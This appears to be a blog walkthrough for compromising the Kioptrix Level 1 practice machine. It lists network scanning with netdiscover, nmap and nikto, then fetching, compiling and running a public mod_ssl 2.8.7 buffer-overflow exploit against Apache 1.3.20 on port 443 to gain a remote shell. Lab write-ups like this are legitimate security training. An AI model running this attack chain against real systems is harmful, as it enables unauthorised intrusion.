Kioptrix: Level 1 Machine walkthrough ...... Step by Step
kioptrix level 1 :-
Level 1 mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
step by step Crack Level 1
1) route -n "scan your gateway ip from your router"
2) netdiscover -i wlan0/eth0 -range 192.168.43.1/24 "scan all network"
3) ******There using two tools NMAP or NIKTO ....*****
1) nmap -sC - T4 -A 192.168.43.198 "nmap using scan port or version"
2) nikto -h 192.168.43.118 "nikto scan your webserver"
4) mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
5) we go www.exploit-db.com > search mod ssl 2.8 "Download exploit ."
6) gcc -o <openfuck => output name > 9549.c -lcrypto "compile your terminal"
7) ./openfuck 192.168.43.118 443 "443 port , openfuck => 9549.c compile"
8) ./openfuck 192.168.43.118 443 "we search apache 1.3.20 "
9) Apache 1.3.20 appears to be outdated (current is at least Apache/2.4.37).
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
10) ./openfuck 0x6b 192.168.43.118 443
11) /bin/bash -i > if this commond use u direct go to terminal shell.........
...................Best of Luck .................................
Comments
Post a Comment